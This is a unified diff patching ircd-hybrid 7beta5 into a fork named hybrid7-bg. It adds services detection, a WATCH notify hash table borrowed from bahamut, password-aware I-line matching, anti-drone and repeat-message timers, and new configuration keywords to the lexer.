diff -uNrd ircd-hybrid-7beta5/src/hash.c hybrid7-bg/src/hash.c
--- ircd-hybrid-7beta5/src/hash.c	Mon Mar  5 21:05:33 2001
+++ hybrid7-bg/src/hash.c	Wed Jul 24 10:05:38 2002
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: hash.c,v 7.28 2001/03/06 02:05:33 androsyn Exp $
+ *  $Id: hash.c,v 1.6 2002/07/24 14:05:38 Administrator Exp $
  */
 
 #include <sys/types.h>
@@ -253,6 +253,59 @@
   ++clientTable[hashv].hits;
 }
 
+void clear_svs_client_hash_table()
+{
+  int i;
+  struct Client* tmp;
+
+  for (i=0; i < U_MAX; i++)
+    if (tmp = (struct Client*)clientTable[i].list)
+      for (; tmp; tmp = tmp->hnext)
+	tmp->svsflags = 0;
+}
+
+int services_present()
+{
+  int i;
+  struct Client* tmp;
+
+  for (i=0; i < U_MAX; i++)
+    if (tmp = (struct Client*)clientTable[i].list)
+      for (; tmp; tmp = tmp->hnext)
+	if (IsServer(tmp))
+          if (find_z_conf(tmp->name))
+            return 1;
+  
+  return 0;
+}
+
+struct Client* find_services()
+{
+  unsigned int hashv;
+  struct ConfItem *aconf;
+  struct Client *tmp;
+
+  extern struct ConfItem *z_conf;
+  for (aconf = z_conf; aconf; aconf = aconf->next)
+    {
+      if (BadPtr(aconf->name))
+	continue;
+
+      hashv = hash_nick_name(aconf->name);
+      tmp = (struct Client*) clientTable[hashv].list;
+
+      for (; tmp; tmp = tmp->hnext)
+	{
+	  if (!IsServer(tmp)) 
+	    continue;
+	  if (irccmp(aconf->name, tmp->name) == 0)
+	    return tmp;
+	}
+    }
+
+  return NULL;
+}
+
 /*
  * add_to_channel_hash_table
  */
@@ -554,4 +607,305 @@
   ++chmiss;
 #endif
   return chptr;
+}
+
+/*
+ *	shamelessly stolen from bahamut				
+ *						-demond
+ */
+
+/*
+ * Rough figure of the datastructures for notify:
+ *
+ * NOTIFY HASH      cptr1
+ *   |                |- nick1
+ * nick1-|- cptr1     |- nick2
+ *   |   |- cptr2                cptr3
+ *   |   |- cptr3   cptr2          |- nick1
+ *   |                |- nick1
+ * nick2-|- cptr2     |- nick2
+ *       |- cptr1
+ *
+ * add-to-notify-hash-table:
+ * del-from-notify-hash-table:
+ * hash-del-notify-list:
+ * hash-check-notify:
+ * hash-get-notify:
+ */
+
+static   aWatch  *watchTable[WATCHHASHSIZE];
+
+void  count_watch_memory(int *count, u_long *memory)
+{
+    int   i = WATCHHASHSIZE;
+    aWatch  *anptr;
+    
+    
+    while (i--)
+    {
+	anptr = watchTable[i];
+	while (anptr)
+	{
+	    (*count)++;
+	    (*memory) += sizeof(aWatch)+strlen(anptr->nick);
+	    anptr = anptr->hnext;
+	}
+    }
+}
+
+void clear_watch_hash_table(void)
+{
+    memset((char *)watchTable, '\0', sizeof(watchTable));
+}
+
+
+/* add_to_watch_hash_table */
+int   add_to_watch_hash_table(char *nick, aClient *cptr)
+{
+    int   hashv;
+    aWatch  *anptr;
+    Link  *lp;
+    
+    
+    /* Get the right bucket... */
+    hashv = hash_nick_name(nick)%WATCHHASHSIZE;
+    
+    /* Find the right nick (header) in the bucket, or NULL... */
+    if ((anptr = (aWatch *)watchTable[hashv]))
+	while (anptr && irccmp(anptr->nick, nick))
+	    anptr = anptr->hnext;
+    
+    /* If found NULL (no header for this nick), make one... */
+    if (!anptr)
+    {
+	anptr = (aWatch *)MyMalloc(sizeof(aWatch)+strlen(nick));
+	anptr->lasttime = CurrentTime;
+	strcpy(anptr->nick, nick);
+	
+	anptr->watch = NULL;
+	
+	anptr->hnext = watchTable[hashv];
+	watchTable[hashv] = anptr;
+    }
+    /* Is this client already on the watch-list? */
+    if ((lp = anptr->watch))
+	while (lp && (lp->value.cptr != cptr))
+	    lp = lp->next;
+    
+    /* No it isn't, so add it in the bucket and client addint it */
+    if (!lp)
+    {
+	lp = anptr->watch;
+	anptr->watch = (Link *)MyMalloc(sizeof(Link));
+	anptr->watch->value.cptr = cptr;
+	anptr->watch->next = lp;
+	
+	lp = (Link *)MyMalloc(sizeof(Link));
+	lp->next = cptr->watch;
+	lp->value.wptr = anptr;
+	cptr->watch = lp;
+	cptr->watches++;
+    }
+    
+    return 0;
+}
+
+/* hash_check_watch */
+int hash_check_watch(aClient *cptr, int reply)
+{
+    int   hashv;
+    aWatch  *anptr;
+    Link  *lp;
+    
+    
+    /* Get us the right bucket */
+    hashv = hash_nick_name(cptr->name)%WATCHHASHSIZE;
+	
+    /* Find the right header in this bucket */
+    if ((anptr = (aWatch *)watchTable[hashv]))
+	while (anptr && irccmp(anptr->nick, cptr->name))
+	    anptr = anptr->hnext;
+    if (!anptr)
+	return 0;   /* This nick isn't on watch */
+    
+    /* Update the time of last change to item */
+    anptr->lasttime = CurrentTime;
+    
+    /* Send notifies out to everybody on the list in header */
+    for (lp = anptr->watch; lp; lp = lp->next)
+	sendto_one(lp->value.cptr, form_str(reply), me.name,
+		   lp->value.cptr->name, cptr->name,
+		   (IsPerson(cptr)?cptr->username:"<N/A>"),
+		   (IsPerson(cptr)?cptr->host:"<N/A>"),
+		   anptr->lasttime, cptr->info);
+    
+    return 0;
+}
+
+/* hash_get_watch */
+aWatch  *hash_get_watch(char *name)
+{
+    int   hashv;
+    aWatch  *anptr;
+    
+    
+    hashv = hash_nick_name(name)%WATCHHASHSIZE;
+    
+    if ((anptr = (aWatch *)watchTable[hashv]))
+	while (anptr && irccmp(anptr->nick, name))
+	    anptr = anptr->hnext;
+    
+    return anptr;
+}
+
+/* del_from_watch_hash_table */
+int   del_from_watch_hash_table(char *nick, aClient *cptr)
+{
+    int   hashv;
+    aWatch  *anptr, *nlast = NULL;
+    Link  *lp, *last = NULL;
+    
+    
+    /* Get the bucket for this nick... */
+    hashv = hash_nick_name(nick)%WATCHHASHSIZE;
+    
+    /* Find the right header, maintaining last-link pointer... */
+    if ((anptr = (aWatch *)watchTable[hashv]))
+	while (anptr && irccmp(anptr->nick, nick))
+	{
+	    nlast = anptr;
+	    anptr = anptr->hnext;
+	}
+    if (!anptr)
+	return 0;   /* No such watch */
+    
+    /* Find this client from the list of notifies... with last-ptr. */
+    if ((lp = anptr->watch))
+	while (lp && (lp->value.cptr != cptr))
+	{
+	    last = lp;
+	    lp = lp->next;
+	}
+    if (!lp)
+	return 0;   /* No such client to watch */
+    
+    /* Fix the linked list under header, then remove the watch entry */
+    if (!last)
+	anptr->watch = lp->next;
+    else
+	last->next = lp->next;
+    MyFree(lp);
+    
+    /* Do the same regarding the links in client-record... */
+    last = NULL;
+    if ((lp = cptr->watch))
+	while (lp && (lp->value.wptr != anptr))
+	{
+	    last = lp;
+	    lp = lp->next;
+	}
+    
+    /*
+     * Give error on the odd case... probobly not even neccessary
+     * No error checking in ircd is unneccessary ;) -Cabal95
+     */
+    if (!lp)
+	sendto_realops_flags(FLAGS_DEBUG, "WATCH debug error: del_from_watch_hash_table "
+		   "found a watch entry with no client "
+		   "counterpoint processing nick %s on client %s!",
+		   nick, cptr->user);
+    else
+    {
+	if (!last) /* First one matched */
+	    cptr->watch = lp->next;
+	else
+	    last->next = lp->next;
+	MyFree(lp);
+    }
+    /* In case this header is now empty of notices, remove it */
+    if (!anptr->watch)
+    {
+	if (!nlast)
+	    watchTable[hashv] = anptr->hnext;
+	else
+	    nlast->hnext = anptr->hnext;
+	MyFree(anptr);
+    }
+    
+    /* Update count of notifies on nick */
+    cptr->watches--;
+    
+    return 0;
+}
+
+/* hash_del_watch_list */
+int   hash_del_watch_list(aClient *cptr)
+{
+    int   hashv;
+    aWatch  *anptr;
+    Link  *np, *lp, *last;
+    
+    
+    if (!(np = cptr->watch))
+	return 0;   /* Nothing to do */
+    
+    cptr->watch = NULL; /* Break the watch-list for client */
+    while (np)
+    {
+	/* Find the watch-record from hash-table... */
+	anptr = np->value.wptr;
+	last = NULL;
+	for (lp = anptr->watch; lp && (lp->value.cptr != cptr);
+	     lp = lp->next)
+	    last = lp;
+	
+	/* Not found, another "worst case" debug error */
+	if (!lp)
+	    sendto_realops_flags(FLAGS_DEBUG, "WATCH Debug error: hash_del_watch_list "
+		       "found a WATCH entry with no table "
+		       "counterpoint processing client %s!",
+		       cptr->name);
+	else
+	{
+	    /* Fix the watch-list and remove entry */
+	    if (!last)
+		anptr->watch = lp->next;
+	    else
+		last->next = lp->next;
+	    MyFree(lp);
+	    
+	    /*
+	     * If this leaves a header without notifies,
+	     * remove it. Need to find the last-pointer!
+	     */
+	    if (!anptr->watch)
+	    {
+		aWatch  *np2, *nl;
+		
+		hashv = hash_nick_name(anptr->nick)%WATCHHASHSIZE;
+		
+		nl = NULL;
+		np2 = watchTable[hashv];
+		while (np2 != anptr)
+		{
+		    nl = np2;
+		    np2 = np2->hnext;
+		}
+		
+		if (nl)
+		    nl->hnext = anptr->hnext;
+		else
+		    watchTable[hashv] = anptr->hnext;
+		MyFree(anptr);
+	    }
+	}
+	
+	lp = np; /* Save last pointer processed */
+	np = np->next; /* Jump to the next pointer */
+	MyFree(lp); /* Free the previous */
+    }
+    
+    cptr->watches = 0;
+    
+    return 0;
 }
diff -uNrd ircd-hybrid-7beta5/src/hook.c hybrid7-bg/src/hook.c
--- ircd-hybrid-7beta5/src/hook.c	Thu May 10 02:30:44 2001
+++ hybrid7-bg/src/hook.c	Tue Jun  5 12:35:46 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: hook.c,v 7.7 2001/05/10 06:30:44 a1kmm Exp $
+ * $Id: hook.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 /* hooks are used by modules to hook into events called by other parts of
diff -uNrd ircd-hybrid-7beta5/src/hostmask.c hybrid7-bg/src/hostmask.c
--- ircd-hybrid-7beta5/src/hostmask.c	Mon May  7 17:27:17 2001
+++ hybrid7-bg/src/hostmask.c	Mon Jul  2 00:12:16 2001
@@ -16,7 +16,7 @@
  *  You should have received a copy of the GNU General Public License
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
- * $Id: hostmask.c,v 7.38 2001/05/07 21:27:17 fl_ Exp $ 
+ * $Id: hostmask.c,v 1.2 2001/07/02 04:12:16 demond Exp $ 
  */
  
 #include <stdlib.h>
@@ -362,7 +362,7 @@
  */
 struct ConfItem*
 find_conf_by_address(const char *name, struct irc_inaddr *addr, int type,
-                     int fam, const char *username)
+                     int fam, const char *username, char *passwd)
 {
  unsigned long hprecv = 0;
  struct ConfItem *hprec = NULL;
@@ -386,6 +386,8 @@
          arec->precedence > hprecv
         )
       {
+	if (passwd && IsConfSkipOnPassFail(arec->aconf) && !BadPtr(arec->aconf->passwd) && strcmp(passwd, arec->aconf->passwd))
+	  continue;
        hprecv = arec->precedence;
        hprec = arec->aconf;
       }
@@ -404,6 +406,8 @@
          arec->precedence > hprecv
         )
       {
+	if (passwd && IsConfSkipOnPassFail(arec->aconf) && !BadPtr(arec->aconf->passwd) && strcmp(passwd, arec->aconf->passwd))
+	  continue;
        hprecv = arec->precedence;
        hprec = arec->aconf;
       }
@@ -422,6 +426,8 @@
         (arec->precedence > hprecv)
        )
     {
+      if (passwd && IsConfSkipOnPassFail(arec->aconf) && !BadPtr(arec->aconf->passwd) && strcmp(passwd, arec->aconf->passwd))
+	continue;
      hprecv = arec->precedence;
      hprec = arec->aconf;
     }
@@ -433,6 +439,8 @@
        arec->precedence > hprecv
       )
    {
+     if (passwd && IsConfSkipOnPassFail(arec->aconf) && !BadPtr(arec->aconf->passwd) && strcmp(passwd, arec->aconf->passwd))
+       continue;
     hprecv = arec->precedence;
     hprec = arec->aconf;
    }
@@ -448,17 +456,17 @@
  */
 struct ConfItem*
 find_address_conf(const char *host, const char *user,
-                  struct irc_inaddr *ip, int aftype)
+                  struct irc_inaddr *ip, int aftype, char *passwd)
 {
  struct ConfItem *iconf, *kconf;
  /* Find the best I-line... If none, return NULL -A1kmm */
- if (!(iconf = find_conf_by_address(host, ip, CONF_CLIENT, aftype, user)))
+ if (!(iconf = find_conf_by_address(host, ip, CONF_CLIENT, aftype, user, passwd)))
   return NULL;
  /* If they are exempt from K-lines, return the best I-line. -A1kmm */
  if (IsConfExemptKline(iconf))
   return iconf;
  /* Find the best K-line... -A1kmm */
- kconf = find_conf_by_address(host, ip, CONF_KILL, aftype, user);
+ kconf = find_conf_by_address(host, ip, CONF_KILL, aftype, user, NULL);
  /* If they are K-lined, return the K-line. Otherwise, return the
   * I-line. -A1kmm */
  if (kconf)
@@ -476,8 +484,8 @@
 {
  struct ConfItem *eline, *dline;
  eline = find_conf_by_address(NULL, addr, CONF_EXEMPTDLINE|1, aftype,
-                              NULL);
- dline = find_conf_by_address(NULL, addr, CONF_DLINE|1, aftype, NULL);
+                              NULL, NULL);
+ dline = find_conf_by_address(NULL, addr, CONF_DLINE|1, aftype, NULL, NULL);
  return dline ? (eline ? eline : dline) : NULL;
 }
 
diff -uNrd ircd-hybrid-7beta5/src/irc_string.c hybrid7-bg/src/irc_string.c
--- ircd-hybrid-7beta5/src/irc_string.c	Tue Apr 24 22:42:58 2001
+++ hybrid7-bg/src/irc_string.c	Tue Jun  5 12:35:46 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: irc_string.c,v 7.29 2001/04/25 02:42:58 androsyn Exp $
+ *  $Id: irc_string.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "config.h"
 #include "tools.h"
diff -uNrd ircd-hybrid-7beta5/src/ircd.c hybrid7-bg/src/ircd.c
--- ircd-hybrid-7beta5/src/ircd.c	Wed May  9 04:08:26 2001
+++ hybrid7-bg/src/ircd.c	Thu Jul 11 15:12:36 2002
@@ -17,13 +17,14 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: ircd.c,v 7.141 2001/05/09 08:08:26 a1kmm Exp $
+ * $Id: ircd.c,v 1.8 2002/07/11 19:12:36 Administrator Exp $
  */
 
 #include <sys/types.h>
 #include <sys/file.h>
 #include <sys/stat.h>
 #include <sys/socket.h>
+#include <sys/resource.h>
 
 #include <stdlib.h>
 #include <string.h>
@@ -212,6 +213,8 @@
         }
 
       limit.rlim_cur = limit.rlim_max; /* make soft limit the max */
+      printf("Value of limit.rlim_max is %ld\n", (long)limit.rlim_max);
+
       if (setrlimit(RLIMIT_FD_MAX, &limit) == -1)
         {
           fprintf(stderr,"error setting max fd's to %ld\n",
@@ -220,6 +223,13 @@
         }
       printf("Value of NOFILE is %d\n", NOFILE);
     }
+
+  if (!getrlimit(RLIMIT_CORE, &limit))
+    {
+      limit.rlim_cur = limit.rlim_max;
+      if (!setrlimit(RLIMIT_CORE, &limit))
+	printf("Value of corefile size is %lu\n", (unsigned long)limit.rlim_cur);
+    }
 #endif        /* RLIMIT_FD_MAX */
 }
 
@@ -596,10 +606,19 @@
  eventAdd("cleanup_channels", cleanup_channels, NULL,
           CLEANUP_CHANNELS_TIME, 0);
 
+ eventAdd("pace_channels", pace_channels, NULL, PACE_CHANNELS_TIME, 0);
+
+ eventAdd("check_warn_drone", check_warn_drone, NULL, CHECK_DRONE_TIME, 0);
+
+ eventAdd("check_drone_queue", check_drone_queue, NULL, 
+		ConfigFileEntry.drone_rate_period, 0);
+
  eventAdd("cleanup_glines", cleanup_glines, NULL, CLEANUP_GLINES_TIME, 0);
   
  eventAdd("cleanup_tklines", cleanup_tklines, NULL, CLEANUP_TKLINES_TIME,
           0);
+
+ eventAdd("purge_repeats", purge_repeats, NULL, ConfigFileEntry.repeat_grace, 0);
   
 #ifdef OPENSSL
  eventAdd("cryptlink_regen_key", cryptlink_regen_key, NULL,
@@ -613,6 +632,8 @@
 
  /* Setup the timeout check. I'll shift it later :)  -- adrian */
  eventAdd("comm_checktimeouts", comm_checktimeouts, NULL, 1, 0);
+
+ fflush(stdout);
  
  ServerRunning = 1;
  io_loop(delay);
diff -uNrd ircd-hybrid-7beta5/src/ircd_lexer.l hybrid7-bg/src/ircd_lexer.l
--- ircd-hybrid-7beta5/src/ircd_lexer.l	Mon May  7 11:50:32 2001
+++ hybrid7-bg/src/ircd_lexer.l	Fri Jul 19 00:23:19 2002
@@ -18,7 +18,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: ircd_lexer.l,v 1.94 2001/05/07 15:50:32 toot Exp $
+ * $Id: ircd_lexer.l,v 1.19 2002/07/19 04:23:19 Administrator Exp $
  */
 
 %option case-insensitive
@@ -112,6 +112,8 @@
 compressed	{ return COMPRESSED; }
 connect		{ return CONNECT; }
 connectfreq     { return CONNECTFREQ; }
+cyrillic        { return CYRILLIC; }
+totaltrans      { return TOTALTRANS; }
 default_floodcount  { return DEFAULT_FLOODCOUNT; }
 deny		{ return DENY; }
 description	{ return DESCRIPTION; }
@@ -125,6 +127,7 @@
 fname_userlog   { return FNAME_USERLOG; }
 fname_operlog   { return FNAME_OPERLOG; }
 fname_foperlog  { return FNAME_FOPERLOG; }
+netid		{ return NETID; }
 gecos		{ return GECOS; }
 general		{ return GENERAL; }
 gline		{ return GLINE; }
@@ -136,6 +139,7 @@
 have_ident	{ return HAVE_IDENT; }
 hide_server	{ return HIDESERVER; }
 host		{ return HOST; }
+maskhost	{ return MASKHOST; }
 hub		{ return HUB; }
 hub_mask	{ return HUB_MASK; }
 persistant_expire_time { return PERSISTANT_EXPIRE_TIME; }
@@ -195,9 +199,11 @@
 send_password	{ return SEND_PASSWORD; }
 sendq		{ return SENDQ; }
 serverinfo	{ return SERVERINFO; }
+services        { return SERVICES; }
 silent          { return SILENT; }
 shared          { return SHARED; }
 short_motd      { return SHORT_MOTD; }
+skip_on_fail    { return SKIP_ON_FAIL; }
 spoof		{ return SPOOF; }
 spoof_notice	{ return SPOOF_NOTICE; }
 unkline		{ return UNKLINE; }
@@ -207,6 +213,22 @@
 vhost		{ return VHOST; }
 warn		{ return WARN; }
 yes		{ return TYES; }
+equivalent      { return EQUIVALENT; }
+nicks           { return NICKS; }
+relays          { return RELAYS; }
+userpar			{ return USERPAR; }
+param			{ return PARAM; }
+dummy           { return DUMMY; }
+
+drone_rate_max		{ return DRONE_RATE_MAX; }
+drone_rate_period	{ return DRONE_RATE_PERIOD; }
+drone_kline			{ return DRONE_KLINE; }
+drone_batch			{ return DRONE_BATCH; }
+drone_kline_time	{ return DRONE_KLINE_TIME; }
+drone_reason		{ return DREASON; }
+spam_wait			{ return SPAM_WAIT; }
+repeat_grace		{ return REPEAT_GRACE; }
+spawn_pass			{ return SPAWN_PASS; }
 
 failed_oper_notice      { return FAILED_OPER_NOTICE; }
 max_accept              { return MAX_ACCEPT; }
@@ -217,6 +239,7 @@
 ts_max_delta            { return TS_MAX_DELTA; }
 ts_warn_delta           { return TS_WARN_DELTA; }
 links_delay           { return LINKS_DELAY; }
+grace_time				{ return GRACE_TIME; }
 kline_with_connection_closed { return KLINE_WITH_CONNECTION_CLOSED; }
 kline_with_reason       { return KLINE_WITH_REASON; }
 warn_no_nline           { return WARN_NO_NLINE; }
@@ -242,6 +265,7 @@
 full                    { return T_FULL; }
 skill                   { return T_SKILL; }
 nchange                 { return T_NCHANGE; }
+rconn					{ return T_REMOTE; }
 rej                     { return T_REJ; }
 unauth                  { return T_UNAUTH; }
 spy                     { return T_SPY; }
